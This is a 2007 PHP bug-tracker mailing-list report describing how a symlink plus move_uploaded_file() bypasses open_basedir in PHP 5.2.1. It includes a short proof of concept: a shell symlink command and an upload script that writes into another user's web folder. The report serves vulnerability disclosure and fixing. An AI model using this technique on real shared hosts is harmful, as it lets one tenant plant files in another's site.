#40931 [NEW]: open_basedir bypass via symlink and move_uploaded_file()

From: Date: Tue, 27 Mar 2007 18:30:13 +0000
Subject: #40931 [NEW]: open_basedir bypass via symlink and move_uploaded_file()
Groups: php.bugs 
Request: Send a blank email to php-bugs+get-110847@lists.php.net to get a copy of this message
From: vladimir at petrov dot ks dot ua Operating system: Linix PHP version: 5.2.1 PHP Bug Type: Safe Mode/open_basedir Bug description: open_basedir bypass via symlink and move_uploaded_file() Description: ------------ User can bypass open_basedir restriction by move_uploaded_file() if target file path is symlink to any directory. Reproduce code: --------------- user1 will upload file to user2's /home/user2/public_html folder. We have in /etc/passwd: user1:x:32001:32001::/home/user1:/bin/bash user2:x:32002:32002::/home/user2:/bin/bash Target folder allows to write for anybody: # ls -lA /home/user2 drwxrwxrwx 2 user2 user2 4096 Mar 27 17:31 public_html/ Apache have mod_php intalled. Apache config for user1: <VirtualHost xxx.xxx.xxx.xxx> ServerName user1.xxxxxxx.com DocumentRoot /home/user1/public_html User user1 php_admin_value open_basedir "/home/user1" </VirtualHost> User user1 can do something like: $ cd /home/user1/public_html/ $ ln -s /home/user2/public_html user2_public_html $ echo '<html><body> <? if ( isset($_FILES["userfile"]) ) { echo "Upload "; if (move_uploaded_file ($_FILES["userfile"]["tmp_name"],"/home/user1/public_html/user2_public_html/file.ext")) echo "ok"; else echo "failed"; } ?> <form name="uplform" method="post" action="<?=$PHP_SELF?>" enctype="multipart/form-data"> <input type="file" name="userfile"> <input type="submit"> </body></html>' > upload.php Expected result: ---------------- If we access http://user1.xxxxxxx.com/upload.php after file upload expected message "Upload failed" and no file /home/user2/public_html/file.ext in target folder. Actual result: -------------- If we access http://user1.xxxxxxx.com/upload.php after file upload we got message "Upload ok" and file /home/user2/public_html/file.ext well exist in target folder. -- Edit bug report at http://bugs.php.net/?id=40931&edit=1 -- Try a CVS snapshot (PHP 4.4): http://bugs.php.net/fix.php?id=40931&r=trysnapshot44 Try a CVS snapshot (PHP 5.2): http://bugs.php.net/fix.php?id=40931&r=trysnapshot52 Try a CVS snapshot (PHP 6.0): http://bugs.php.net/fix.php?id=40931&r=trysnapshot60 Fixed in CVS: http://bugs.php.net/fix.php?id=40931&r=fixedcvs Fixed in release: http://bugs.php.net/fix.php?id=40931&r=alreadyfixed Need backtrace: http://bugs.php.net/fix.php?id=40931&r=needtrace Need Reproduce Script: http://bugs.php.net/fix.php?id=40931&r=needscript Try newer version: http://bugs.php.net/fix.php?id=40931&r=oldversion Not developer issue: http://bugs.php.net/fix.php?id=40931&r=support Expected behavior: http://bugs.php.net/fix.php?id=40931&r=notwrong Not enough info: http://bugs.php.net/fix.php?id=40931&r=notenoughinfo Submitted twice: http://bugs.php.net/fix.php?id=40931&r=submittedtwice register_globals: http://bugs.php.net/fix.php?id=40931&r=globals PHP 3 support discontinued: http://bugs.php.net/fix.php?id=40931&r=php3 Daylight Savings: http://bugs.php.net/fix.php?id=40931&r=dst IIS Stability: http://bugs.php.net/fix.php?id=40931&r=isapi Install GNU Sed: http://bugs.php.net/fix.php?id=40931&r=gnused Floating point limitations: http://bugs.php.net/fix.php?id=40931&r=float No Zend Extensions: http://bugs.php.net/fix.php?id=40931&r=nozend MySQL Configuration Error: http://bugs.php.net/fix.php?id=40931&r=mysqlcfg

« previous php.bugs (#110847) next »